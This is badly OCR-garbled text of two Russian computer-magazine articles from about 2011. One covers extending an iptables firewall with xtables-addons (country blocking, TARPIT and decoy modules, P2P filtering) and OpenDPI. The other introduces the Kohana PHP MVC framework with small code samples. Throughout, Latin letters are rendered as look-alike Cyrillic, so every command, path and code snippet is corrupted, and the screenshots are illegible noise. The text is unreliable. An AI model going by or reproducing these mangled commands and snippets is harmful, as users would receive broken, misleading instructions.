# Логи Аз{ег1$К 

]Лобра*И = /уаг/105/а${ег1$К/тез5аве$ 

# Переопределяем дефолтные значения 
тахге*гу = 5 

БапЕ1те = 6000 


Проверяем, запущены ли сервисы: 


$ зидо зег\у1се 1рфаб1е$ фагЕ 
$ зидо зег\у1се фа112Бап $ФагЕ 


Работу Еа(2Бап можно отследить, просмотрев журнал /маг/ 
(о9/а{2Бап.(09 или правила {а е5. 


[НТТР:/ЛМИМИАМ 


р ИпК5 
® Сайт Ка|2Бап — 


Га(2Бап.ога. 


® Ресурсы ОрепОР] 
— орепарт.ога, соде. 
доо4(е.согп/р/орепари. 


® Сайт Ха {ез-аоп$ 
— хаб е5-аЧ4опс. 


5 пе{. 


› 099 


97 


Терыннал 


Шайп Прывюя Выл Позы Терыннап Владин Спруиека 
Терминал 

повиоеее - 3 зада Зрывеь +6 -п 

|Спафе ТЫРЫТ Грефасу ОВОР} 


м Терминал и 


тапреЕ ргоф сре зоигсе дез патом 

Так ал-35А тер -- 0.0.0.079 й.0.8. вла мл 1роге Ярогта 22 
АЕЕЕРТ Тр -- 102,18.10.2 0.0.0.070 тер Падуе НСТ ив ко 
АССЕРТ обр -- 192,188.18.2 в.0.0. Ву 

АССЕЕТ тер -- 192.168.18.2 й. 1.8. Ви Тер 1803г бет тивкае 
АЕКЕРТ Ор -- 102.1688.10.2 0.0.0.070 

АССЕРТ 211 -- в.в. виа в.9. 6, Ву 

АССЕРТ евр -- @.0.0.0/г@ й.0. 0.0/0 Тааце: ауд ШузЕе бита 
АЕЕЕРТ 811 -- 0.0.0.670 й.0.0. 070 

ВАО 11 -- в, 0,6. ва У. 29. 2.255 

ВАР 811 -- @.0: 0. вле 192.188.10.25% 

`АССЕРТ евр -- 0.0.0. 6/и@ й. 0.0.08 Таей Е: ау Фиеее Бигат $ 
ВАС 1 -' 22.0.0678 в. 6.0. 

ВАР #11 -- 0.0.0. ла 23.255.248.288 

рае в -- 0.0.0.60 224.0. 0. 078 

ВАСЯ А == 224.0,0.вРВ 0.0.0. ВУ 

ОАО #11 -- 285.:285.205.258 й.й. 8.08 

рае В. == 0.0.0.68 224.0.0. 078 

ОВО 211 -- 6,0, в. в/в в.9. 6.8 

ОА 11 -- 0.0.0. вла й.1.0.й 

рае 11 -- 0.0.0, ве й.0.0. 070 эае ПРУАЕ ТО 

Е а -# в,0, 0, виа в. 0.0.08 Наш: ауд Плат БигуЕ 5 
тиви а -- 0:6. вла й. 1.1.97 

Тивокмо #11 -- 0.0.0. 6/9 й.0.0. 0/0 

Ы5 РАТЕВ 011 -- 0.0.0.670 9.0, 9,в7а 

и а 9.0.0. вла 8.0.0.070 ГИ = Ще: С-В рге1х т пЕгоыту Тефит" 
5 РГЕТеА а11 й. 0.0.0 ла й.0. 0. 97а 

| 21 8.0.0. 67а 0.0.0.00 ОБ ых 0 Теме б риеЁЫх “Ппклом Тару“ 
ТАЯТ тер @. в. 0. Виа 8.0.0. ВВ тер @рЕ:22 

Сайнт РОЛИАЯО [рейфсу ОНР 

агуеЕ ртоЕ ©рЕ зоигсе веер паса 

АССИРТ евр -- 0,0,0. ие й.0.0. 08 Тавут: амй Шузае бита 3 
АЕСЕРТ февр == 0,0,0.в/8 в. 0.0. 076 Тай: дуд Плыес бигьт 5 
Ц РОТЕ 211 -- 0,8. 6.0/8 в.0, В.В 

[г #11 -- 0.0.0. 0/8 й.0.0. 07 126 Поа0я @ Теме @ реа Нх “пКломи Гогыага' ы 


я 


После активации тай2бап в цепочках 1р1ае$ появляются 
новые правила 


$ сидо 1реаб1ез -1 -у | вгер #а112Бап 


Коллекция аддонов Фа е$-а9оп$ 


Проект расв-о-пла{с (-п9), предлагавший различные расширения 

для рае, уже некоторое время не развивается, его место занял 
Хаез-аЧЧоп$ ({аЦез-аЧопз.5Ёпе{). Главная его особенность — для 
установки модулей не требуется пересборка ядра и/или 'р{аЫес. В итоге 
добавление новых функций происходит очень просто, нет проблем и 
при обновлении ядра. Если ядро собиралось вручную, проверь наличие 
СОМЕС_МЕТЕШТЕК_ХТАВИЕЗ в параметрах: 


$ егер -1 хеаб1ез /Боо*/сопЯ?-`ипамте -г` 
СОМЕТ@ _МЕТЕТЕТЕК_ХТАВЕЕ$ =т 


В одних дистрибутивах основные модули уже включены в базовый со- 
став, в других — размещены в репозиториях пакетов. В бути команла: 


$ идо ар*-сасйе зеагсН х+аб1е$-а@4оп$ 


...ВЫДаст два Пакета: один синструментами и библиотеками, другой 1. 
исходниками. 


$ 5ид0 ар*-ве* Би11а-дер х+аб1е5-адоп$ - соттоп 


Как правило, в репе находится не самая актуальная версия, поэтому 
качаем с сайта архив с исходнымитекстами, распаковываем и даем стан- 
дартную последовательность команд: «./сопЙдиге; паке; паке т$аЦ>. 
Проверяем загрузку модуля: 


$ 15то4 х_+а61е$ 


Теперь можно создавать правила. 

В состав пакета входит более 20 модулей иутилитразличного назна- 
чения. Документации на сайте кактаковой нет, но практически все, что 
нужно для старта, описано в «тап жа е-аЧ Чоп». Разберем самые по- 
пулярные изних.Отфильтровать шныряющих сканеров и ботов вручную 
по |Р-адресам невозможно, но можно существенно уменьшить поток, 
отрезав страны, имеющие «скверную репутацию». Модуль беоР по- 
зволяет применять правила к пакетам на основании страны источника/ 
назначения. Но чтобы фильтр работал, необходимо скачать иустановить 
базы. Для этой цели используются два скрипта, лежащие в каталоге /и®г/ 
(Бехес/жае$-аЧдопз (или /изг/ИБ/жае$-аЧ оп]. Для обработки С5\ 
потребуется соответствующий модуль Рег: 


$ са /чзг/11Бехес/ха6Б1е$-ад4оп$/ 
$ зи4о ./х+_вео1р_а1 


> 100 


Е 
Е 

# 

. 


ое! 1те ТРООЦЕ РАОТОСОЕ НТТР 7 
очетцее ТРОДИЕ РАОТОСОЕ МОМ в 


ое ие ТРООЦЕ РАОТОСОЕ ИТР 9 
эде! те ТРООШЕ РАОТОСОЕ НЕТВТО5 36 
очет ие ТРООИЕ РАОТОСОЕ НР и 
эце ие ТРООЦШЕ РАОТОСОЕ 550Р 12 
где! 1те ТРОЦИЕ РАОТОСОЕ ВСР 13 
фе! 1ге ТРОЦИЕ РАОТОСОЕ МР 14 
ое! те ТРООЦЕ РАОТОСОЕ ХОМСР 15 
где! 1те ТРООЦЕ РАОТОСОЕ 508 16 
Че! ТРОбИЕ РАОТОСОЕ 55106 17 
ое ие ТРООЦЕ РАЮТОСОЕ ОНСР 18 
ве 1ле ТРОЦШЕ РАЮТОСОЕ РОЗТСВЕ$ 19 
ге 1те ТРООШЕ РАОТОСОЕ МУЗСА. 28 
одет 1те ТРООИЕ РАОТОСОЕ 105 21 


оетцие ТРООИЕ РАОТОСОЕ ОТАЕСТ ООО ЦМК 22 
одет 1те ТРООШЕ РАОТОСОЕ 1235 

дей те ТРООШЕ РАОТОСОЕ АРРИЕХЛСЕ 

одет ее ТРООИЕ РАОТОСОЕ ОТАЕСТСОММЕСТ 25 
ое ле ТРООЦШЕ РАОТОСОЕ 5ОСВАТЕЗ 

обет те ТРООИЕ "РАОТОСОЕ МТИМХ 

оетее ТРООИЕ РАОТОСОЕ МАМКА ГТО 

деле ТРООШЕ РАОТОСОЕ РАСО 

ое! те ТРООЦЕ РАОТОСОЕ ЕТАЕТОРТА 

вет 1ее ТРООЦЕ РАОТОСОЕ 1МЕЗН 

ое! те ТРООЦЕ РАОТОСОЕ КОНТАКТ 

одет 41те ТРООШЕ РАОТОСОЕ ОРЕМЕТ 

вет цее ТРООЦЕ РАОТОСОЕ РАЗТТВАСК 

эде1 те ТРООШЕ РАОТОСОЕ СМЛЕДА 

де! 1те ТРОДШЕ РАОТОСОЕ ЕООМЖЕТ 

одет ие ТРООИЕ РАОТОСОЕ ВТТТОЖАЕМТ 

ое! 1ге ТРООШЕ РЯОТОСОЕ ЕЕ 38 
оде!Чте ТРООЦЕ РАОТОСОЕ АМТ 39 


ОрепОР! поддерживает большое количество протоколов 


З5ЯхЕННЕЧЕЗа 25 


$ эиао тКа1г /изг/Паге/х*_вео1р 
$ зидо ар*-ве{ 1п$5+а11 116%ехЕ-с\у-х$-рег1 
$ зидо ./хе_ вео1р_Би11А4 -0 /чзг/Ваге/х*_вео1р *.с$\ 


После выполнения последней команды будет выведена таблица стран, 
которые затем указываются через запятую в параметрах '--°гс-сс' (страна 
источник}, '--4${-сс' [назначение]. Все параметры можноузнать, выпол- 
нив «раз -тп деор -Пе[р». 


// Блокируем азиатских друзей 

$ эидо 1рЕаб1е$ -А ТМРОТ -т вео1р \ 
--5гс-сс СМ, ТМ, КК --) КЕЗЕСТ 

// Блокируем анонимные прокси 

$ зидо 1рфаб1е$ -А ТМРОТ -т вео1р \ 
--5гс-сс А1 -) КЕЗЕСТ 

// Подключаться к $$Н можно только из России 

$ зидо 1рфаб1е$ -А ТМРОТ -р ср -арог* 22 \ 
-т вео1р ! -згс-сс КУ -) КЕЗЕСТ 

// Запрет исходящих ТСМР в некоторые страны 

$ зидо 1рфаб1е$ -А ОЦТРОТ -р 1стр -м вео1р \ 
—9$1-сс Е -] КЕЗЕСТ 


Используя бед Р, можно маркироватьтрафик, чтобы его обрабатывать 
по-другому или считать отдельно: 


1рфаб1е$ -А ТМРОТ -р ср --арог* 89 -т вео1р \ 
--5гс-сс КИ --) МАВК --зеф-тагК 1 


Все привыкли, что атакуемый хостотражаетнападение, просто блокируя 
|Р-адрес, и никакактивно не противодействует злоумышленнику. В 
комплекте аддонов доступно несколько модулей, позволяющих ответить 
или ввести в заблуждение. Самый известный изних носит название 
ТАКБРП. Работаетон просто: при подключении соединение открывает, 
но вот закрыть «забывает» (посылает в ответ пакет с размером ТСР окна 
равным нулю). Удаленная система правильно обработатьтакой посыл не 
может и отправляет в ответ сообщение о закрытии соединения, которое 
игнорируется. В итоге соединение «висит» около двадцати минут, по- 
требляя ресурсы удаленной системы. Например, 55Н-сервер часто под- 
вешиваютна порт, отличный от22. Это спасает отнекоторых сканеров, 
для остальных ставим ловушку: 


$ зидо 1рфаб1ез -А ТМРОТ -р ср -т ср \ 
-рогт 22 --) ТАКРТТ 


Теперь все, кто попробует ПОДКЛЮЧИТЬСЯ к22 порту, попадут в расставлен- 
ные сети. 
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ы пе [гообфинег плаг всп арльге Ри енв = += 
ЗВаАп Прыкса Вил Гожы Терыннал Вкладин Справка 
а и 
ваке[ 5]: Цель Чата -Чата-ва* не требует выполнения команй. 
вакг [5]: Выхой из каталога ‘ве изиегу оса Цех «офи = 1, Зее ригено 
Выхой из каталога ‘Ловелиег жа ея - о фолир- 1, 5 Ге егнь оп ирыгонс К" 
ЧРЗРОЫ 9 АВ =" 
ваке [3]: Выхой м каталога ‘Рева гух ый инр-пофоень» 1, Зе овень логи 
вайе[ 2]: Цель `Уикы - ааа" не требует выпопнение юсанй. 
ваке[2]1 Выхой из каталога ”Гровегизегукт аа - пои - 1, 9 еее опа * 
ваке[1]: Выход мз каталога ‘Гповегиегуктаь ея с фоеиь- 1, 35 ест 
набег Зпзта Л За феогр 
вае[1]1 Ихой в каталог °Уповегивагухтаь ея - аНфол- 1.8 рвоЕр” 
ваке [2]: Вой в каталог “мове лиреги ав ев -аОфог- 1. 5 удеойр” 
ТезЕ сх "Роги осаи амех Гера соболь" || ИБатеюО г р "ги оса Беата 5 аддопх” 
ЗегиБалилатаИИ -2 хе реср БН хе вор 91 "Разг оса Бове кВа - 5ЗЗОП а 
терр -т "его у пагеувыылАват” || ИБфлиаюьг ср “Лига па га вает = 
гибли ла с св 644 кр оеофр 609,1 ит феор ОА, "ие оса И Рывгелаал Авант ^ 
ваке[2]1 Выхой из каталога ^Повагицегухевь ея - воин - 1, 9 Адер" 
ваке[1]: Выхой мз каталога ^ Бове ивегиаь ИА «пфоене = 1, Зоо" 
ваме[1]: Вход в каталог ^/мовегиеги ха ес -а0Фопу "1.33" 
вай -! Макеева в11; 
ваке [2]; Вой в кэталог ‘мове гие та ев -адфоп- 1.35" 
вайе[ 2]: Выхой ма каталога ‘ве иаиегу жа ие пон" 1,35 
ваке[2]1 Вкой в каталог “са ливеги та ея - вое 1.15 
ваще фиета вес -ВоОК 
ваке[з]: Вхой в каталог “Бове гизегу ха ес -а0Фопу "1.35" 
ераю -в || гг 
ваке[ 3]: Выход ма каталога ‘Бове ивегу ка ее аффоень- 1, 39 
паке -{ Маке е-шапх а: 
ваКе[]1 Иход в каталог ^ обе ливени та ея - ва допа-1.35* 
ваке[ 2]: Выхой мь каталога ‘ово ивегуктай нех -афоен- 1,35’ 
ТевЕ т "Ициги оса у зпагеуыилуаьата" || УБалиекыг р "Ригу оса Ипа ге уваги" 
ГИ лиТлатал -с -а 644 кевБТея-вфола В ушргиосаТ асе ецалвапй 
ваке[2]: Выход мар каталога °ГПовегивегиктв о о ффоен- 1.39 
ваке[1]: Выхоа из каталога ‘ое неги а ие асан» 1,3%" 


пеатоиеег — гии 2 - ВбопЬ 1.25 $ 140 | фгер СЫБаа : 
1 вы ит 3 циаЫе пас, пиве вапоце, Призьйе ГУЛтег 
х Так Ааа 12 хр вые роге, хе Це, хт терофр. ре 606, ЁрЕ МАБОЦЕНАСЕ, хе О5СР, ре АЕЗЕСТ, ЖЕ рае, рае 


пае,Превье вала, ЗртабТе ТУМиег, р ав ее 
иатвеое г - ГЕТОБТая- плену -1. 19 © || з 


После установки Жае$-аЧ4оп$ будет загружен соответ- 
ствующий модуль ядра 


Модуль ОЕГОПЕ позволяет ввести в заблуждение сканер, показывая, что 
запрашиваемый порт открыти принимает подключения. Если тыещене 
решил, какой лучше, ТАКРИ или ВЕГОПЕ, используй СНАОЗ, который в 
ответна запрос применяет в основном ОКОР [поумолчанию кбольшин- 
ству пакетов}, но иногда — ТАВРИТ, ВЕГОВЕ или РЕЗЕСТ. Поведение 
модуля можно изменить, установив параметры при загрузке при помощи 
'--дешае’/--{агри’ или в процессе выполнения в файле /5уз/гподщес/ 
х{ СНАОб/рагатеегс. 

Проект!РР?Р прекратил свое существование, но ваддонах доступен 
соответствующий модуль, позволяющий распознавать Р?Р-трафик, 
который затем можно блокировать или ограничить. В качестве доппара- 
метров можноуказать один изР?Р-протоколов, либо все сразу: 


$ зи4о 1рфаб1ез -А РОВМАКО -м 1рр2р --1рр2р --) ОВОР 


Анализируем трафик с Ореп0Р! 


Межсетевые экраны, работающие на втором и третьем уровнях, давноуже 
перестали удовлетворять современным требованиям обеспечения без- 
опасности. Например, блокировка портов, используемых СО, ничего не 
даст. Пользователь может обойти запрет, подключившисьчерез прокси, 
работающий на разрешенных портах вроде 80. Только поднявшись выше, 
проанализировав данные прикладного уровня, можно действительно 
ограничить нежелательный трафик. Стандартными средствами 'р{аБе5 
этого добиться нельзя, поэтому юниксоиды взяли на вооружение | 7-НЦег 
и1РР?Р. Но говорить о нихне будем, так как им на смену пришло более ин- 
тересное решение — ОрепОР! (орепар!.ога, соде.доод(е.сопп/р/орепарй. 
Распространяемый подлицензией ЕСРЕУЗ, Ореп0Р! построен на коде 
коммерческого продукта РАСЕ, который разрабатывается компанией 
|родче. То есть основа солидная, так как РАСЕ позиционируется каксред- 
ство классификации трафика иуправления пропускной способностью 
сетей уровня интернет-провайдера. Все возможности по определению 
протоколов перешли отРАСЕ кОреп0Р!: Р?Р, Куре, \МаР, М, потоковое 
видео и аудио, сетевые игры и прочее [подробнее о ОР! читай во врезке]. 
Ставим необходимые для сборки пакеты: 


$ зи40 ар*-ве{ 1п5{а11 таке всс 116рсар-ае\у 


Скачиваем с сайта проекта орепар!-1.2.0{аг.д7 и орепар!-пеЦег- 
у/гаррег-1.1 {аг.д7, а затем устанавливаем в соответствии с инструкциями 
внутри, не забыв наложить два патча: 


$ Еаг -х7+ орепар1 -пе Я1%ег-мгаррег-1.1.+аг.57 
$ са орепар1 -пее#1{ег-игаррег-1.1 

$ фаг -х2+ф ../орепар1-1.2.0.Фаг.57 

$ са орепар1-1.2.0 

$ ражсй -ре < ../1ра_мта1т. И. 91+ 
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= Терминал = 4 
Фэйп Правка Вид Потк Терминал Ввладжи Справа 


Терминал % тс оссфчиегии антов Ли... Терминал 3 Терминал х 
цзегфирег у гиа1 -васиате /о;зг/ЛАоса1/11Вехес/хта\е5-аб0опу $ ^С 
изегфизег- уго -васи {ие /озг/Лоса1/ 16 схес/хтаБЛез-аб6оть $ $060 ./х% деойр Би119 -0 /цзг/зваге/х 


{ део1р *.с5у 
153777 ептг1е5 тота\ 
9 1Руб гапдез Тог А1 Апопутюм$ Ргоху 
91 1Р\4 гапде$ Тог А1 Апопуюои$ Ргоху 
9 ТРуб гапде$ Тог А2 Зате11е Ргоу1дег 
2498 1Ру4 гапфез Тог А2 бате\\14е Ргоу1дег 
1 1Руб гапдез Тог АО Апдогга 
17 1Р\4 гапдез Тог АО Апдогга 
6 1Руб гапдез$ Тог АЕ Ип!{ед Агабь Ем1гафе$ 
315 1Ру4 гапдез Тог АЕ Оп!Кед АгоаБ Ею1гате$ 
9 ТРуб гапдез Тог АЁ Атонап1 $ фап 
231 1Ру4 гапдез Тог АЕ А'онап1 {оп 
©® 1Руб гапдез Тог АС Ап\1оца апб Вага 
123 1Ру& гапдез Тог Аб Ап41дца ап@ Вага 
9 ТРуб гапде$ Тог АТ Апои1 Ща 
19 1Р\и4 гапдез Тог АТ Апди Ла 
1 1Руб гапдез Тог АЕ А1Бапт1а 
61 1Ру4 гапде$ Тог АЁ А\Бап1а 
13 ТРиб гапдез Тог АМ Агаеп1а 
83 1Ру4 гапдез Тог АМ Агвеп1а 
8 ТРуб гапде$ Тог АМ Мезпег\ат9$ Ап 11 1е5 
84 ТРу$ гапдез Тог АМ НМе{пег1 3095 Апх11165 
1 1Руб гапдез Тог АО Апдо\а 
125 1Руё гапдез Фог АО Апос1а 
1 ТРуб гапдез Тог АР Аз1а/Рас111с Вед1оп 
244 1Ру4 гапдез Тог АР Аз1а/Рас!111с Вед1оп 
9 1Руб гапдез Тог АО Аптагс\1са 
28 ТРыйё глпаюс Фаг Аб Аптагсй1 сл 


Ставим базы для бедР 


$ ражсй -ре < ../1ра_рго*осо1$.П. 91+ 


Устанавливаем переменную среды: 


$ ехрогЕ ОРЕМОРТ_РАТН=$ (рма) 


Но здесь есть проблемы. В документации сказано, что поддерживает- 
ся ванильноеядро [2.6.27-33}, в остальных случаях Ореп0Р! можетне 
собраться или работать не так. На форуме проекта можно найти патчи 
для некоторых новых версий кернела. Например, по адресу с'ск.ги/ 
О\\Л8 доступен патч для 2.6.35 (такое ядро используется в последнем [1$ 
Убит). Кроме этого вядре должны бытьустановлены опции СОМЕС _ 
МЕ_СОММТКАСК_ЕУЕМТЗ иСОМЕС_МЕ_СТ_МЕТИМК. В большинстве 
современных дистрибутивовтак сделано поумолчанию. В Убиг{и и 
некоторых других .сопЯд-файл лежитв каталоге /боо{. Можно легко про- 
верить. Берем патч, копируем его в орепар!-пеЦег-м/гаррег, применя- 
ем, азатем выполняем сборку: 


$ са ../мгаррег 
$ ражсй -р3 < ../орепар1-пеЕЯ1ег-игаррег-1.1_2.6.35_м3.рафсВ 
$ маке 


Если все равно получаем ошибку, тогда пробуем ванильное ядро версии 
2.6.33. Ставим модуль: 


$ зидо таке тоаи1е$_1п${а11 
$ зидо ср 1р*/116х*_ орепар1.5зо /116/хЕаб1е$ 


Загружаем и можем использовать: 


$ зидо тоаргобе х*_орепар1 


Все доступные Параметры можно получить, введя: 


$ зидо 1рфаб1е$ -т орепар1 --Ве1р 


Выбираем нужный протокол [они также описаны в файле 'рд_рго{осо[$ _ 
о$Чр!.Н} и блокируем его: 


1реабБ1е$ -А РОВМАВЬО -т орепар1 --61Фоггеп* -3 ОВОР 


Это самый простой вариант, можно маркировать нужныйтрафик, чтобы 
затем использовать в шейпере. 


Заключение 


Используя сторонние наработки, можно легко расширить стандартные 
возможности раб {е$, существенно снизив риски для хоста или целой 
сети. Конечно, некоторое время придется затратить на создание и отлад- 
ку необходимых правил, но это впоследствии окупится сполна. 17 
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Ш № Игорь «бр!4ег_МЕТ» Антонов (В#р://уг-опИпе.ги} 


\МЕВ-ПРИЛОЖЕНИЯ 


С ТУРЬОНАДДУВОМ 


Фф жи 


проекти Е 


блон 
0уе 


© Прошли те времена, когда было модно разрабатывать меВ- 
приложения, состоящие из одного сценария, по уши напичканного 
кодом. На дворе 2011 год, и уже как-то несолидно придерживаться 
столь консервативных идей. Время двигаться вперед и отдавать 
предпочтение современным методам разработки — применению 
Сотщеп{ Мападцетеп{ ЕгатемогК. Сегодня я познакомлю тебя с 
одним из лучших представителей современных СМЕ. 


Чтотакое фреймворк? 


Сот{еп{( Мападетеп( Егатемюгк (СМЕ] — набор инструментов для 
разработки систем управления контентом (Сог(еп{ Мападетег\ 
буфет"). В отличие отСМ5, фреймворки (в большинстве случаев] не 
готовы к работе сразу, поскольку они представляют собой лишь от- 
дельные кирпичики. Задача разработчика — набраться сил и сложить 
из этих материалов полноценное приложение. СМ$ — это тоже своего 
рода «кубики», но они готовы к работе из коробки и вполне могут функ- 
ционировать без доработки кода. 


Триглавныхплюса СМЕ 


Если отфреймворков не было особой пользы, то никто бы не решился 
использовать их в своих проектах — жизнь современного разработ- 
чика и так достаточно тяжела. Из наиболее ощутимых плюсов СМЕ 
можно выделить: 

1. Оптимизированный код. Над фреймворками трудятся разработчи- 
ки, уделяющие оптимизации достаточно много времени. 

2. Скажи «нет» велосипедам. Как правило, в фреймворке уже имеются 
готовые решения для типичных задач. Туттебе и структура папок, 

и вспомогательные библиотеки, и куча всяких вкусностей. Многие 
вещи изначально готовы к работе и позволяют разработчику сразу 
приступить к разработке функционала приложения, не развлекаясь 
написанием кучи рутинного кода. 

3. Упрощенная командная работа. Если проект разрабатывается 
целой командой, то применение СМЕ [особенно популярного} дает 
ощутимый плюс при появлении в команде новенького. Ему будет про- 
ще включиться в проект, так как для этого необходимо ознакомиться с 
СМЕ, по которому наверняка написано множество статей и мануалов. 


Святаят а: модель, представле- 
ние, Контроллер р 


Всех разработчиков тер можно разделить на две большие группы 
— «гангстеры» и «законопослушные граждане». Первые не придер- 
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живаются никаких стандартов и хорошо зарекомендовавших себя 
решений, а делают все наобум. Они не думают ни о каких шаблонах 
проектирования, а просто лепят код. В большинстве случаевтакие 
программисты не способны заниматься большими проектами. 
«Грабануть поезд» (в смысле, сорвать небольшой куш, написав про- 
стенькое приложение] — это всегда пожалуйста. Сделают быстро и без 
лишнего шума. А вотс крупными деламиу них возникают проблемы. 
Для проектов, ГЗ которых содержит фразу «должен быть масштаби- 
руем», такие «специалисты» не годятся, поскольку наколбасить кучу 
кода в одном модуле и забыть втаких проектах не получится. Тутнужен 
определенный подход и максимальное разделение кода. 

За годы развития языков программирования были созданы различ- 
ные методики — паттерны («шаблоны») проектирования ПО. Одним из 
таких паттернов и является Моде|-\еми/-Соп(гоЦег. Я бы даже сказал, 
что сегодня это, наверное, самый популярный шаблон. 

Не буду ходить вокруг да около, а сразу перейду к сути. Если ты знаком 
с этим паттерном, то следующий раздел статьи можешь пропустить и 
перейти сразу к практике. Ну атем, кто не в курсе, настоятельно реко- 
мендую уделить время теории, поскольку при разработке на Ковапа 
тебе в обязательном порядке придется придерживаться шаблона 
МУС. 


Контроллер 


Контроллер в М\УС выполняет роль некоего диспетчера- 
регулировщика. Он не должен изменять или добавлять данные, 
производить расчеты ит.д. Его цель — обслуживать поступающие 
запросы и на каждый такой запрос соответствующим образом 
отвечать. Например, пользователь обращается к главной страни- 
це сайта нашего журнала — ВИр://хакер.ги. Его запрос в первую 


очередь получает определенный контроллер [если рассматривать 
на примере шаблона МУС). После получения запроса он выпол- 
няет действие, забинденное на данный тип запроса. Причем сам 
контроллер ни в коем случае не должен содержать код для выборки 
данных ит.д. Сама выборка должна быть организована в модели. 
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Модель 


В модели описывается вся бизнес-логика приложения. 
Выборки, модификация данных, расчеты — все это долж- 
но выполняться в модели, к которой и будет обращаться 
контроллер. Причем все сгенерированные в модели 
данные не должны содержать разметку. Только данные в 
сыром виде и ничего больше. 


Представление 


Последний компонент архитектуры МУС — представле- 
ние. Этот элемент отвечает за вывод данных в нужном 
виде. Именно во вьюшках (сленговое название представ- 
ления] и должна быть вся разметка. Несомненно, в них 
также может содержаться и программный код, отвечаю- 
щий сугубо за вывод данных, полученных от контроллера. 
Но никакой бизнес-логики там быть не может. 
Перспективы и плюсы использования МУС очевидны. 
Помимо решения банальной задачи вроде отделения 
бизнес-логики отинтерфейсаты автоматически полу- 
чаешь возможность комфортной командной разработки. 
Одни разработчики могут заниматься совершенствова- 
нием моделей, другие — готовить представления ит.д. 


11$ 5 Копапа 


Корапа — это бесплатный фреймворк с открытым ис- 
ходным кодом. В качестве шаблона проектирования, как 
ты уже и догадался, в Копапа применяется паттерн — 
Моде! Ме Соп\гоЦег. 


КовВапа полностью объектно-ориентирована и использует 


в полной мере возможности последних версий интерпре- 
татора РНР. В отличие от многих бесплатных продуктов с 
открытыми сорцами, Ковапа распространяется под ли- 


цензией В$0, ане СР(.. Это подразумевает, что ты можешь 
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ЧТО ПОЧИТАТЬ 


® ПЦр://до00.д/$К]оо — моя большая статья про 


Соде!дпкег Ковапа берет свое начало именно с этого 
проекта. Несмотря на крутизну КоПапа, иногда не 

грех воспользоваться и Соде|дпкег ом. К тому же, 
разработчики вроде бы опять возобновили разработку. 
® ПЕр://ковапагапте\могК.ога/ — официальный сайт 
проекта КоРапа. Здесь ты найдешь сам фреймворк, 

а также всевозможную документацию и примеры 
использования. После прочтения статьи рекомендую 


сразу поселить этот ЕСС. 


® ПИр:/Л/г-опИпе.ги — всегда свежие статьи по 
программированию. В плане СМЕ, ресурс может 
похвастаться наличием статей по Соде!дпкег, Огира( и 


о. 


® ПИр://Кегкпез5.са/^иКИдоки.рВр — хорошая 


неофициальная документация по КоВапа. 


применять данный продуктсовершенно бесплатно какв 
личных, таки в коммерческих проектах. 


Ставим Копапа 


Для начала прогуляйся до официального сайта и загрузи 
последнюю версию фреймворка. Загруженный архив 


закачай к себе на хости извлеки его содержимое. Попро- 


буй обратиться к директории своего хоста, в которую ты 


извлек фреймворки... — приготовься к облому. Наверняка 


ты не пройдешь Епмгопппеп{ Тез{$ [тест окружения). 


[2у0 


› Чуа 


Все сорцы и стафф 
для разработки ждут 
тебя на диске. 


| МАВММ6_ 


› магптпд 


Кстати, применение 
МУ\УС само по себе не 
сможет избавить тебя 
от проблем проекти- 
рования. Выход один 
— читать доки! 
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В моем случае тесты на запись в директорию хранения кэша и логов 
тоже завершились неудачей. Для исправления ситуации нужно всего 
лишь выставить права на запись для этих директорий. В общем, вы- 
ставляй права и пробуй обновить страницу. В случае успехаувидишь 
текст: «Уоцг епигопгтеп( раз5ед аЦ гедигегтеп{(. Кетоуе ог гепате 
{Бе ш$аЦ.рбр [е пом/». Помимо радостного известия о готовности 
окружения для работы фреймворка, текст сообщения требует оттебя 
удаления файла п${аЦ.рр. Не будем брыкаться и выполним эту 
пустяковую просьбу. Удалив инсталляционный сценарий, попробуй 
обновить страницу. Если ты все сделал правильно, то браузер выплю- 
нетдевственно чистую страницу с текстом «ВеЦо, ммог(9». 


Нео м/о!ана Копапа 


Передтем как перейти к рассмотрению полезного примерчика, по- 
пробуем наколбасить собственный «НеЦо мо а». Создадим новый 
текстовый файл и напишем в нем следующий текст: 


<?рИр аебпеа( '5У$РАТН') ог а1е( "№ @1гесЕ* зсг1ре ассез5.'); 
с1а55 Сопфго11]ег_Тез* ехфепа$ Соп®го11ег { 
рчб11с РипсЕ1оп ас 1оп_1пдех() 


{ 


$ЕН 15 - >гезроп$е- >Боду ( "Не11о мог1а! Не11о, еуегуопе!!!"); 


} 


В этом клочке кода я описываю наш первый контроллер — класс 
Сог(гоЦег_Те$, унаследованный отСоптгоЦег. Обрати внимание на 
имя класса. В имени содержится СогигоЦег [обязательный префикс}, 

а после него идет непосредственно название контроллера. Его мы 
пишем с большой буквы. В моем случае именем контроллера является 
Тез{. Контроллеры и модели должны храниться в директории Арр/ 
с[аззе$/соп{гоЦеги Арр/с<(аззе$/ппо4е|. 


Создаем первую модель 


Пробный контроллерунасесть, теперь посмотрим, как описываются 
модели. Сначала рассмотрим вариант модели, которой не требуется 
взаимодействие с базой данных. Например, представим, что нам 
нужно определить модель му г${Моде(: 


с1а55 Моае1_ туЕ1г5{Моде]1 ехфеп4$ Моае1 
{ 
рчб11с РипсЕ1оп са1сТ* (а, Б) { 
гебигп а+ЬБ; 


В этой модели я объявил всего один метод — сах. Он выполняет 
операцию сложения над переданными в качестве параметра пере- 
менными. 

Увы, если требуется работать с базой данных, то модельтакого вида 
не прокатит. Все модели, предназначенные для взаимодействия с 
СУБД, должны наследоваться от Моде! _Па{аразе. Например, нам 
требуется написать модель, в которой предусмотрена возможность 
выборки данных изтаблицы изегз. Такая модель будет выглядеть 
примерно так: 


с1а$5 Моае1 туЕ1г${ОВМоде1 ехфепа$ ВафаБазе_Моае1 


{ 
рчб11с КипсЕ1оп зе1ес®Важа() { 


гефигп $411$ -> аБ -> ачегу ( ' зе1ес* изегМаме, 
ра$$ гот изег$'); 


} 
} 


Делаем первое представление 


Ты знаешь, что представления в архитектуре МУС предназначены для 
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отображения сгенерированного контента. Модель получает данные в 
сыром виде и возвращает их контроллеру, а тот, в свою очередь, дол- 
жен передать их представлению. Уже во вьюшке создается красивая 
обертка, готовая к выводу пользователю. 

Все созданные представления должны храниться в папке мем, 
расположенной в директории твоего приложения. По умолчанию 
директорией приложения является АррИсайоп. Создавать представ- 
ления чрезвычайно просто. Ради эксперимента попробуем создать 
представление абоц%. Его код будет выглядеть примернотак: 


<Ит1> 
<Веаа> 
<{1Е1е><?рНр еспо ФЕ1Те ?></141е> 
</Пеаа> 


оо © 


Я специально не стал приводить остальную часть кода, так кактам 
может присутствовать абсолютно любой П1т(-код. Нас интересует 
